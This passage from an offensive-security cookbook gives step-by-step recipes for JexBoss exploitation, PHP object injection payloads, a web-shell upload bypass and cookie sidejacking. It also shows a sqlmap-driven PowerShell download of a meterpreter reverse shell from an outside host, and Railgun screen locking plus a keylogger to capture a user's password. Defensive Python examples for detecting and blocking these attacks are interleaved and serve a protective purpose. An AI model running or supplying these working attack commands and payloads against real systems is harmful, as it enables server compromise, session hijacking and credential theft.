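In a real application the lock is usually the database: a conditional update such as UPDATE vouchers SET redeemed = 1 WHERE code = ? AND redeemed = 0, granting the discount only when exactly one row was affected, gives the same single-winner behaviour across many web workers, which an in-process lock cannot.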


See also 


You can refer to the following articles for more information: 


- http://antoanthongtin.vn/Portals/0/UploadImages/kiennt2/KyYeu/DuLieuTrongNuoc/Duliew/KyYeu/07.race-condition-attacks-in-the-web.pdf 
- https://sakurity.com/blog/2015/05/21/starbucks.html 
- http://www.theregister.co.uk/2016/10/21/linux_privilege_escalation_hole/ 


Exploiting JBoss with JexBoss 


JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java 
Application Servers (for example, WebLogic, GlassFish, Tomcat, Axis2, and so on). 


It can be downloaded at https://github.com/joaomatosf/jexboss. 


How to do it... 


We begin by navigating to the directory into which we cloned JexBoss and then follow the given 
steps: 


1. We install all the requirements using the following command: 


pip install -r requires.txt 


The following screenshot is an example of the preceding command: 


(screenshot: pip install -r requires.txt run inside the jexboss directory) 





2. To view the help, we type this: 


python jexboss.py -h 


The following screenshot shows the output of the preceding command: 


# python jexboss.py -h 

(screenshot: the jexboss usage line, listing options such as --version, --auto-exploit, --disable-check-updates, -mode {standalone,auto-scan,file-scan}, --proxy PROXY, --proxy-cred LOGIN:PASS, --jboss-login LOGIN:PASS, --timeout TIMEOUT, -host HOST, -network, -ports PORTS, -results FILENAME, -file FILENAME_HOSTS and -out FILENAME_RESULTS) 





3. To exploit a host, we simply type the following command: 


python jexboss.py -host http://target_host:8080 


The following screenshot is an example of the preceding command: 


ss# python jexboss.py -host 192.168.2.101:8080 





This shows us the vulnerabilities. 





4. We type yes to continue exploitation: 





5. This gives us a shell on the server: 


Shell> whoami 





Exploiting PHP Object Injection 


PHP Object Injection occurs when insecure user input is passed through the PHP unserialize() function. 
When we pass a serialized string of an object of a class to the application, the application accepts it, 
PHP reconstructs the object, and it usually calls magic methods if they are defined in the class. Some 
of these methods are __construct(), __destruct(), __sleep(), and __wakeup(). 


This leads to SQL injections, file inclusions, and even remote code execution. However, in order to 
successfully exploit this, we need to know the class name of the object. 


How to do it... 


The following steps demonstrate PHP Object Injection: 


1. Here, we have an app that is passing serialized data in the GET parameter: 


/xvwa/vulnerabilities/php_object_injection/?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme%20Vulnerable%20Web%20Application";} 


(screenshot: the XVWA PHP Object Injection page. Its text explains that, though PHP Object Injection is not a very common vulnerability and is difficult to exploit, it can lead an attacker to perform different kinds of attacks such as code injection, path traversal and denial of service, depending on the application context, because inputs are not sanitized before being passed to unserialize() on the server side. It links to https://www.owasp.org/index.php/PHP_Object_Injection; the sidebar lists the other XVWA exercises such as SQL Injection, SQL Injection (Blind), OS Command Injection, XPATH Injection and Formula Injection.) 


2. Since we have the source code, we can see that the app uses the __wakeup() function and that the class 
name is PHPObjectInjection: 


<?php 
class PHPObjectInjection { 
    public $inject; 
    function __construct() { 
    } 
    function __wakeup() { 
        if (isset($this->inject)) { 
            eval($this->inject); 
        } 
    } 
} 
if (isset($_REQUEST['r'])) { 
    $var1 = unserialize($_REQUEST['r']); 
} 


3. Now we can write a code with the same class name to produce a serialized object containing our 
own command that we want to execute on the server: 


<?php 
class PHPObjectInjection { 
    public $inject = "system('whoami');"; 
} 

$obj = new PHPObjectInjection; 
var_dump(serialize($obj)); 
?> 


4. We run the code by saving it as a PHP file, and we should have the serialized output: 


MacBook-Air:Desktop Himanshu$ php serialize.php 
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" 


5. We pass this output into the r parameter and we see that here, it shows the user: 


php_object_injection/?r=O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system(%27whoami%27);";} 





(screenshot: the same XVWA PHP Object Injection page, now showing the output of whoami below its explanatory text: daemon) 


6. Let's try passing one more command, uname -a. We generate it using the PHP code we created: 


<?php 
class PHPObjectInjection { 
    public $inject = "system('uname -a');"; 
} 

$obj = new PHPObjectInjection; 
var_dump(serialize($obj)); 
?> 


7. And we paste the output in the URL: 


php_object_injection/?r=O:18:"PHPObjectInjection":1:{s:6:"inject";s:19:"system('uname -a');";} 


(screenshot: the XVWA PHP Object Injection page loaded with the new payload) 


8. Now we see the command being executed and the output is as follows: 


Darwin MacBook-Air.local 16.1.0 Darwin Kernel Version 16.1.0: Thu Oct 13 21:26:57 PDT 2016; root:xnu-3789.21.3~60/RELEASE_X86_64 x86_64 
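The serialized strings in this recipe follow a small grammar, and the safest way to handle them on the defending side is to parse them without ever instantiating anything. The following Python code is an added example and is not part of the book, of XVWA or of PHP; it parses PHP's serialize() format into plain values, lists every class an unserialize() call would instantiate, and classifies a URL-encoded request parameter accordingly, which is the check a WAF rule or a log-triage script needs. The two sample inputs are the benign array and the PHPObjectInjection string from the walkthrough above; the function names are this example's own.

```python
from urllib.parse import unquote

class PhpUnserializeError(ValueError):
    """The input is not well-formed serialize() output."""

def php_unserialize(payload):
    """Parse PHP serialize() output into plain Python values without instantiating anything.
    Arrays become dicts; objects become ("object", class_name, {property: value}) tuples.
    PHP counts string lengths in bytes, so the input is viewed as Latin-1 (one char per byte)."""
    if isinstance(payload, str):
        payload = payload.encode("utf-8")
    data = payload.decode("latin-1")
    pos = 0

    def take(token):                       # consume a literal token or fail
        nonlocal pos
        if not data.startswith(token, pos):
            raise PhpUnserializeError("expected %r at offset %d" % (token, pos))
        pos += len(token)

    def read_until(ch):                    # consume up to and including ch, return what preceded it
        nonlocal pos
        end = data.find(ch, pos)
        if end < 0:
            raise PhpUnserializeError("missing %r after offset %d" % (ch, pos))
        token, pos = data[pos:end], end + 1
        return token

    def read_string():                     # len:"bytes", with the declared length checked against the data
        nonlocal pos
        length = int(read_until(":"))
        take('"')
        raw = data[pos:pos + length]
        if len(raw) != length:
            raise PhpUnserializeError("truncated string at offset %d" % pos)
        pos += length
        take('"')
        return raw.encode("latin-1").decode("utf-8", "replace")

    def read_members(count):               # {key;value;...} shared by arrays and object properties
        members = {}
        take("{")
        for _ in range(count):
            key = parse()
            members[key] = parse()
        take("}")
        return members

    def parse():
        kind = data[pos:pos + 1]
        if kind == "N":
            take("N;")
            return None
        take(kind + ":")
        if kind in ("b", "i", "d"):
            return {"b": lambda t: t == "1", "i": int, "d": float}[kind](read_until(";"))
        if kind == "s":
            value = read_string()
            take(";")
            return value
        if kind == "a":
            return read_members(int(read_until(":")))
        if kind == "O":
            class_name = read_string()
            take(":")
            return ("object", class_name, read_members(int(read_until(":"))))
        raise PhpUnserializeError("unsupported type %r at offset %d" % (kind, pos))

    value = parse()
    if pos != len(data):
        raise PhpUnserializeError("trailing data at offset %d" % pos)
    return value

def object_classes(value):
    """Every class name unserialize() would instantiate for this value, nested ones included."""
    found = []
    if isinstance(value, tuple) and value and value[0] == "object":
        found.append(value[1])
        value = value[2]
    if isinstance(value, dict):
        for item in value.values():
            found.extend(object_classes(item))
    return found

def check_request_param(raw_param):
    """Classify one URL-encoded parameter value the way a WAF rule or a log-triage script would."""
    try:
        value = php_unserialize(unquote(raw_param))
    except PhpUnserializeError as exc:
        return {"serialized": False, "classes": [], "verdict": "not PHP-serialized (%s)" % exc}
    classes = object_classes(value)
    return {"serialized": True, "classes": classes,
            "verdict": "object injection attempt" if classes else "plain serialized data"}

# Constructed inputs matching the recipe: the array XVWA sends by default, and the object built in step 4.
BENIGN_PARAM = 'a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme%20Vulnerable%20Web%20Application";}'
INJECTED_PARAM = 'O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system(%27whoami%27);";}'
```

On the PHP side the equivalent mitigation is to stop accepting objects at all: unserialize($data, ['allowed_classes' => false]) (PHP 7.0 and later) turns any O: entry into a __PHP_Incomplete_Class whose magic methods never run, and exchanging JSON instead of serialized PHP removes the problem entirely.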


See also 


- https://mukarramkhalid.com/php-object-injection-serialization/#poi-example-2 
- https://crowdshield.com/blog.php?name=exploiting-php-serialization-object-injection-vulnerabilities 
- https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/ 


Backdoors using web shells 


Shell uploads are fun; uploading web shells gives us more power to browse around the servers. In this 
recipe, you will learn some of the ways in which we can upload a shell on the server. 


How to do it... 


The following steps demonstrate the use of web shells: 


1. We first check whether the user is DBA by running sqlmap with the --is-dba flag: 


[12:38:38] [INFO] the back-end DBMS is Microsoft SQL Server 
web server operating system: Windows 2003 or XP 
web application technology: ASP.NET, Microsoft IIS 6.0, ASP 
back-end DBMS: Microsoft SQL Server 2008 
[12:38:38] [INFO] testing if current user is DBA 
current user is DBA: True 
[12:38:39] [WARNING] HTTP error codes detected during run: 
500 (Internal Server Error) - 1 times 
[12:38:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/vide 


2. Then, we use --os-shell, which prompts us with a shell. We then run the command to check which 
privileges we have: 


whoami 


The following screenshot is an example of the preceding command: 


os-shell> whoami 

do you want to retrieve the command standard output? [Y/n/a] 
[12:44:04] [INFO] the SQL query used returns 1 entries 
[12:44:05] [INFO] retrieved: nt authority\\\\system 

command standard output [1]: 

[*] nt authority\system 


3. Luckily, we have admin rights. But we don't have RDP available to outside users. Let's try another 
way to get meterpreter access using PowerShell. 


4. We first create an object of System.Net.WebClient and save it as a PowerShell script on the system: 


echo $WebClient = New-Object System.Net.WebClient > abc.ps1 


5. Now we create our meterpreter.exe via msfvenom using the following command: 


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe 


6. Now, we need to get our meterpreter downloaded, so we append the following command to our 
abc.ps1 script (note the dot before DownloadFile and the quotes around both arguments): 


echo $WebClient.DownloadFile("http://odmain.com/meterpreter.exe", 
"D:\video\b.exe") >> abc.ps1 


The following screenshot is an example of the preceding command: 


os-shell> echo $WebClient = New-Object System.Net.WebClient > 3.ps1 
do you want to retrieve the command standard output? [Y/n/a] Y 
[20:57:14] [INFO] retrieved: 1 

[20:57:15] [INFO] retrieving the length of query output 

[20:57:15] [INFO] retrieved: 

[20:57:16] [INFO] retrieved: 


command standard output [1]: 


[x] 


os-shell> echo $WebClient.DownloadFile("htt 1.exe", "D:\video\b.exe") >> 3.ps1 
do you want to retrieve the command standard output? [Y/n/a] Y 

[20:57:27] [INFO] retrieved: 1 

[20:57:28] [INFO] retrieving the length of query output 

[20:57:28] [INFO] retrieved: 

[20:57:28] [INFO] retrieved: 

command standard output [1]: 

[*] 





7. By default, PowerShell is configured to prevent the execution of .ps1 scripts on Windows systems. 
But there's an amazing way to still execute scripts. We use the following command: 


| powershell -executionpolicy bypass -file abc.ps1 


The following screenshot is an example of the preceding command: 


os-shell> powershell -executionpolicy bypass -file 3.ps1 

do you want to retrieve the command standard output? [Y/n/a] Y 
[20:58:03] [INFO] retrieved: 1 

[20:58:04] [INFO] retrieving the length of query output 
[20:58:04] [INFO] retrieved: 

[20:58:05] [INFO] retrieved: 

command standard output [1]: 


[x] 





8. Next, we go to the directory D:/video/ where our file (b.exe) was downloaded and execute it. To catch 
the connection on our own machine, we start the handler using the following command: 


| msfconsole 


The preceding command will open up msf as shown in the following screenshot: 


msf > use exploit/multi/handler 
msf exploit( ) > set PAYLOAD windows/meterpreter/reverse_tcp_dns 
PAYLOAD => windows/meterpreter/reverse_tcp_dns 
msf exploit( ) > set LHOST <Your IP Address> 
LHOST => <Your IP Address> 
msf exploit( ) > set LPORT 4444 
LPORT => 4444 
msf exploit( ) > set Encoder x86/shikata_ga_nai 
Encoder => x86/shikata_ga_nai 
msf exploit( ) > set EXITFUNC process 
EXITFUNC => process 
msf exploit( ) > set ExitOnSession false 
ExitOnSession => false 
msf exploit( ) > set Iterations 5 
Iterations => 5 
msf exploit( ) > exploit -j 
Exploit running as background job. 
Handler failed to bind to 1... 
Started reverse TCP handler on 0.0.0.0:4444 
Starting the payload handler... 
Sending stage (957487 bytes) ... 
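From the defender's side, the chain this recipe leaves on the target is a database server process spawning cmd.exe, followed by PowerShell started with -executionpolicy bypass -file. The following Python is an added example, not code from the book: it runs simple indicator checks over constructed Sysmon-style process-creation records (the Key=Value|Key=Value line format, the set of suspicious parent processes and the sample events are all assumptions). 

```python
"""Detection logic for the chain the recipe produces on the target:
sqlmap os-shell -> xp_cmdshell -> cmd.exe -> powershell -executionpolicy bypass.
Added example over constructed Sysmon-style process-creation lines; it is not
code from the book. The 'Key=Value|Key=Value' line format is an assumption."""
import re
from dataclasses import dataclass, field

# Server processes that have no business spawning a shell (assumption:
# tune the set to the roles of the host being monitored).
SUSPICIOUS_PARENTS = {"sqlservr.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# PowerShell accepts unambiguous prefixes of -ExecutionPolicy, so match the
# usual short forms as well as the full switch.
BYPASS_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"net\.webclient|downloadfile|downloadstring", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    parent: str
    image: str
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Split a constructed 'Key=Value|Key=Value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(lines):
    """Return one Finding per process-creation event that matches an indicator."""
    findings = []
    for no, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev.get("Event") != "ProcessCreate":
            continue
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        reasons = []
        if parent in SUSPICIOUS_PARENTS and image in SHELLS:
            reasons.append(f"shell spawned by {parent}")
        if image == "powershell.exe" and BYPASS_RE.search(cmd):
            reasons.append("execution policy bypass")
        if image == "powershell.exe" and DOWNLOAD_RE.search(cmd):
            reasons.append("WebClient download in command line")
        if reasons:
            findings.append(Finding(no, parent, image, reasons))
    return findings


# Constructed sample events (not real logs). Lines 1, 2 and 4 should fire.
SAMPLE_LOG = [
    "Event=ProcessCreate|Image=C:\\Windows\\System32\\cmd.exe"
    "|ParentImage=C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe"
    "|CommandLine=cmd.exe /c whoami",
    "Event=ProcessCreate|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=powershell -executionpolicy bypass -file abc.ps1",
    "Event=ProcessCreate|Image=C:\\Windows\\System32\\notepad.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe",
    "Event=ProcessCreate|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe"
    "|CommandLine=powershell -ep bypass -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/b.exe','D:\\video\\b.exe')",
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.parent} -> {f.image}: {', '.join(f.reasons)}")
```

The parent/child check is the strongest of the three signals: a script written with echo and run with -file never shows WebClient on the command line, but sqlservr.exe or w3wp.exe launching cmd.exe is abnormal regardless of what the shell goes on to do. 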





Backdoors using meterpreters 


Sometimes, we may also come across a file upload that is initially meant to upload files such as Excel, 
photos, and so on, but there are a few ways through which we can bypass it. In this recipe, you will see 
how to do that. 


How to do it... 


The following steps demonstrate the use of meterpreters: 


1. Here, we have a web application that uploads a photo: 





2. When we upload a photo, this is what we see in the application: 







3. Let's see what happens if we upload a .txt. We create one with test as the data: 







4. Let's try uploading it: 







5. Our file has been deleted! This might mean our application is doing either a client-side or a 
server-side check for the file extension. 


6. Let's try to bypass the client-side check. We intercept the request in Burp and try to alter the 
extension in the data submitted: 




7. Now we change the extension from .txt to .txt;.png and click on forward: 







This is still being deleted, which tells us that the application is probably doing a server-side check. 


One way to bypass it would be to add the header of an image in front of the code we want to 
execute. 


8. We add the header GIF87a and try to upload the file: 


And then we upload this: 





9. We see that the file has been uploaded. 
10. Now we try to add our PHP code: 


<?php 
$output = shell_exec('ls -lart'); 
echo "<pre>$output</pre>"; 
?> 


But our PHP has not been executed still. 


11. However, there are other file formats too, such as .pht, .phtml, .phtm, .htm, and so on. Let's try .pht. 


Our file has been uploaded. 







12. We browse the file and see that it has been executed! 


localhost/aa/upload/test1.php.pht 


GIF87a; 
Notice: Undefined index: c in /Applications/XAMPP/xamppfiles/htdocs/aa/upload/test1.php.pht on line 1 


Warning: system(): Cannot execute a blank command in /Applications/XAMPP/xamppfiles/htdocs/aa/upload/test1.phy 


13. Let's try executing a basic command: 


?c=whoami 


localhost/aa/upload/test1.php.pht?c=whoami 









GIF87a;daemon 


We can see that our command has been successfully executed and we have uploaded our shell on the 
server. 
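The three gaps probed in this recipe (an extension check done only on the client, a GIF87a header glued in front of script code, and alternative interpreter extensions such as .pht) all close with one server-side validator. The following Python is an added example, not the book's code or that of the application shown; the accepted image types, the script markers and the constructed sample uploads are assumptions. 

```python
"""Server-side upload validation that closes the three gaps probed above:
a client-side-only extension check, an image header (GIF87a) prepended to
script code, and alternative interpreter extensions such as .pht. Added
example, not the book's code; the accepted types and the constructed sample
uploads are assumptions."""
import re
import secrets

# Allowlist: canonical extension -> magic bytes a genuine file starts with.
# Anything not listed here (.txt, .php, .pht, .phtml, ...) is refused.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}
ALIASES = {"jpeg": "jpg"}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# A valid image header proves nothing about what follows it, so look for
# interpreter tags as defence in depth. Short tags such as '<?' would
# false-positive on binary image data, so only unambiguous forms are used.
SCRIPT_MARKERS = (b"<?php", b"<script")
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised with the reason an upload was refused."""


def validate_upload(filename, data):
    """Return the canonical extension for an acceptable upload, else raise."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    # One stem, one dot, one extension: test1.php.pht and test.txt;.png both
    # fail here, and the stem may not carry ';', NUL or path separators.
    parts = filename.split(".")
    if len(parts) != 2 or not STEM_RE.match(parts[0]):
        raise UploadRejected("filename must be <stem>.<ext> with a plain stem")
    ext = parts[1].lower()
    ext = ALIASES.get(ext, ext)
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} is not permitted")
    # The declared type must agree with the file's own header.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected(f"content does not look like a .{ext} file")
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers found inside image data")
    return ext


def is_accepted(filename, data):
    """Boolean convenience wrapper around validate_upload."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


def storage_name(ext):
    """Never store under the user's name: server-chosen random name plus the
    validated extension, so the interpreter's handler mappings never see
    an attacker-controlled suffix."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed uploads mirroring the recipe's attempts.
    for name, blob in [("photo.gif", b"GIF89a" + bytes(32)),
                       ("test.txt", b"test"),
                       ("test.txt;.png", b"\x89PNG\r\n\x1a\n" + bytes(16)),
                       ("test1.php.pht", b"GIF87a;<?php echo 1; ?>")]:
        print(name, "accepted" if is_accepted(name, blob) else "rejected")
```

The marker scan is a heuristic; the robust complement is to re-encode every accepted image with an image library and to serve the upload directory with script execution disabled, so that even a file that slips through is never handed to PHP. 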


Network Exploitation on Current Exploitation 


In this chapter, we will cover the following recipes: 


Man in the middle with hamster and ferret 
Exploring the msfconsole 

Using the paranoid meterpreter 

A tale of a bleeding heart 

Redis exploitation 

Say no to SQL— owning MongoDBs 
Embedded device hacking 

Elasticsearch exploit 

Good old Wireshark 

This is Sparta! 


Introduction 


Exploiting networks is often a technique that comes in handy. A lot of times, we may find that the most 
vulnerable point in a corporate environment is the network itself. In this chapter, you will learn about some 
of the ways in which we can pentest a network and successfully exploit the services we find. 


Man in the middle with hamster and ferret 


Hamster is a tool that can be used for sidejacking. It acts as a proxy server, while ferret is used for 
sniffing cookies in the network. In this recipe, we will look at how to hijack some sessions! 


Getting ready 


Kali already has the tool preinstalled, so let's see how to run it! 


How to do it... 


Hamster is extremely easy to use and comes with a UI too. Follow the given steps to learn the use of 
hamster: 


1. We start by typing the following command: 


| hamster 


The following screenshot shows the output for the preceding command: 


root@kali: ~ 


:~# hamster 
--- HAMPSTER 2.0 side-jacking tool --- 
Set browser to use proxy http://127.0.0.1:1234 
G: set_ports option(1234) 


mg_open_listening_port (1234) 
listening on 127.0.0.1:1234 
egining thread 





2. Now we just need to fire up our browser and navigate to http://localhost:1234: 


HAMSTER 2.0 Side-Jacking 


STEPS: In order to sidejack web sessions, follow the ... SECOND, wait a few seconds and make sure packets 
... click on that target to "clone" it's session. FIFTH, ... 
TIPS: remember to refresh this page occasoinally to ... WHEN SWITCHING target, rember to close all 
windows in your browser ... 


[ adapters | help ] 


No target has been selected yet 


Status 
Proxy: unknown 
Adapters: none 
Packets: 0 
Database: 0 
Targets: 0 

3. Next, we need to click on adapters and choose the interface we want to monitor: 


To start monitoring, type in the adapter name and hit the [Submit] ... mode monitoring. You may have 
to first configure the adapter ... 


eth0   Submit Query 


No target has been selected yet 


4. We will wait for a while and we will see sessions in the tab on the left-hand side tab: 





192.168.0.106 
cookies 


HAMSTER 2.0 Side-Jacking 


TIPS: remember to refresh this page o... sure to purge all cookies from the brow... 
WHEN SWITCHING target, rember to cl...se all windows in your browser and purge all cookies first 


Status 
Proxy: unknown 
Adapters: none 
Packets: 0 
Database: 768 
Targets: 4 


If you don't see sessions after a few minutes, it may be because hamster and ferret are not 
in the same folder. Hamster runs and executes ferret along with it in the background. 


Some users may face problems because ferret is not supported on 64-bit architecture. We 
need to add a 32-bit repository and then install ferret. It can be done using: 
dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386. 
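Sidejacking works only because the session cookie crosses the network in the clear, which is what the Secure attribute prevents. The following Python is an added example, not code from the book or from hamster/ferret: it audits Set-Cookie headers for the attributes whose absence makes a session usable by a sniffer. The list of session-cookie names and the sample headers are constructed assumptions. 

```python
"""Audit Set-Cookie headers for the attributes whose absence makes a session
usable by a sidejacker: without Secure the cookie is sent over plain HTTP,
where ferret can sniff it. Added example over constructed headers; not from
the book. The set of session-cookie names is an assumption."""

SESSION_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "session", "sid"}


def parse_set_cookie(header):
    """Return (name, value, attributes) for one Set-Cookie header value.
    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their text."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_cookie(header):
    """List the weaknesses of one cookie, most relevant to sniffing first."""
    name, _value, attrs = parse_set_cookie(header)
    problems = []
    if "secure" not in attrs:
        problems.append("no Secure flag: sent over plain HTTP and visible to a sniffer")
    if "httponly" not in attrs:
        problems.append("no HttpOnly flag: readable from script")
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True or str(samesite).lower() == "none":
        problems.append("no restrictive SameSite attribute")
    return name, problems


def audit_response(set_cookie_headers):
    """Report only the cookies that look like session identifiers."""
    report = {}
    for header in set_cookie_headers:
        name, problems = audit_cookie(header)
        if name.lower() in SESSION_NAMES and problems:
            report[name] = problems
    return report


# Constructed headers (not captured from any real site).
SAMPLE_HEADERS = [
    "PHPSESSID=4f2c9d8e; Path=/",
    "JSESSIONID=AB12CD34; Path=/app; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/; Max-Age=31536000",
]

if __name__ == "__main__":
    for name, problems in audit_response(SAMPLE_HEADERS).items():
        print(name)
        for p in problems:
            print("  -", p)
```

Run against a site's real responses, the first cookie is the one hamster would list as a clonable target; the second cannot be captured from plain HTTP traffic at all, and HSTS on the server removes the remaining window in which a browser might be talked into an unencrypted request. 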


Exploring the msfconsole 


We have already covered some basics of Metasploit in the previous chapters. In this recipe, you will 
learn some techniques to use meterpreter and Metasploit for more efficient exploitation. 


How to do it... 


To learn about Metasploit follow the given steps: 


1. Let's start the Metasploit console, by typing msfconsole: 


Trouble managing data? List, sort, group, tag and search your pentest data 
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 


       =[ metasploit ...                                  ] 
+ -- --=[ 1607 exploits - 914 auxiliary - 278 post        ] 
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 





2. To see the list of exploits available, we use the following command: 


| show exploits 


The following screenshot shows the output for the preceding command: 


...al/ibstat_path                 ... ibstat $PATH Privilege Escalation 
...                               ... Calendar Manager Service Daemon (rpc.cmsd) Opcode ... 
...ttdbserverd_realpath           ... ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow 
... 
android/adb/adb_server_exec 


3. Similarly, in order to see the list of payloads, we use the following command: 


| show payloads 


The following screenshot shows the output for the preceding command: 


msf > show payloads 


... Shell, Bind TCP Inline                                   normal 
... shell_find_port      Shell, Find Port Inline             normal 
... shell_interact                                           normal 
... Reverse HTTP Stager                                      normal 
... Android Meterpreter, Reverse HTTPS Stager                normal 
android/meterpreter/reverse_tcp                              normal 





4. Metasploit also comes with hundreds of auxiliary modules that contain scanners, fuzzers, sniffers, 
and so on. To see the auxiliary modules, we use the following command: 


| show auxiliary 


The following screenshot shows the output for the preceding command: 


Auxiliary 
========= 


admin/2wire/xslt_password_reset                  2Wire Cross-Site Request Forgery Password Reset Vulnerability 
admin/android/google_play_store_uxss_xframe_rce  Android Browser RCE Through Google Play Store XFO 
admin/appletv/appletv_display_image              Apple TV Image Remote Control 
admin/appletv/appletv_display_video              Apple TV Video Remote Control 
admin/atg/atg_client                             Veeder-Root Automatic Tank Gauge (ATG) Administrative Client 
admin/backupexec/dump                            Veritas Backup Exec Windows Remote File Access 
admin/backupexec/registry                        ... 





5. Let's use an FTP fuzzer with the following command: 


| use auxiliary/fuzzers/ftp/ftp_client_ftp 


6. We will see the options using the following command: 


| show options 


7. We set the RHOSTS using the following command: 


| set RHOSTS x.x.x.x 


8. We now run the auxiliary, which notifies us in case a crash happens: 


Connecting to x.x.x.x on port 21 
... without command - 2017-02-16 23:5... 
Character ... 
-> 
-> 
(fuzzer output continues) 





Railgun in Metasploit 


In this recipe, we learn more about Railgun. Railgun is a meterpreter-only Windows exploitation 
feature. It allows direct calls to the Windows API from the meterpreter session. 


How to do it... 


Railgun allows us to perform a lot of tasks that Metasploit modules alone cannot, such as pressing keyboard 
keys and so on. Using this, we can make Windows API calls to perform all the operations we need for even 
better post exploitation: 


1. We have already seen in the previous chapters on getting a meterpreter session. We can jump into 
Railgun from meterpreter by typing the irb command: 


meterpreter > irb 
[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> 


2. To access Railgun, we use the session.railgun Command: 


>> session.railgun 
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun:0x0000001290e2e8 @client=#<... 
"NT AUTHORITY\SYSTEM @ CORELAN XP3">, @dlls={"user32"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLL 
... @dll_path="user32", @win_consts=#<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::WinConstManager 
... "FKF_AVAILABLE"=>2, "LINE_AGENTSTATUSEX"=>29, "REGDF_GENFORCEDCONFIG"=>32, ... "WM_SYSCHAR"=>262, 
... "WM_GETICON"=>127, ... "CTRY_CANADA"=>2, ... "SOUND_SYSTEM_BEEP"=>3, ... (output truncated) 





We see that a lot of data has been printed. These are basically the available DLLs, Windows constants 
and functions we can use. 


3. To have a better view in order to see the DLL names, we type the command: 


| session.railgun.known_dll_names 


The following screenshot shows the output for the preceding command: 


>> session.railgun.known_dll_names 


=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", ... 





4. To view the functions of a DLL, we use the following command: 


| session.railgun.<dllname>.functions 


The following screenshot shows the output for the preceding command: 


>> session.railgun.kernel32.functions 

=> {"GetConsoleWindow"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLLFunction:0x000000054088c8 
@return_type="LPVOID", @params=[], @windows_name="GetConsoleWindow", @calling_conv="stdcall">, 
"ActivateActCtx"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLLFunction:0x00000005543288 
@return_type="BOOL", @params=[["HANDLE", "hActCtx", "inout"], ["PBLOB", "lpCookie", "out"]], 
@windows_name="ActivateActCtx", @calling_conv="stdcall">, 
"AddAtomA"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLLFunction:0x00000005542b30 @return_type=... 





5. Let's try to call an API, which will lock the screen of the victim. We can do that by typing the 
following command: 


| client.railgun.user32.LockWorkStation() 


We can see that we are locked out: 







6. Let's imagine a situation where we want to obtain a user's login password. We have the hash, but we 
are unable to crack it. Using Railgun, we can call the Windows API to lock the screen and then run a 
keylogger in the background, so when the user logs in again, we will have the password. Metasploit 
already has a post exploitation module that uses Railgun to do this; let's try it! 


We exit our irb shell, put our meterpreter session in the background and then use the module: 


| use post/windows/capture/lockout_keylogger 


The following screenshot shows the output for the preceding command: 


>> exit 
meterpreter > background 


Backgrounding session 1... 
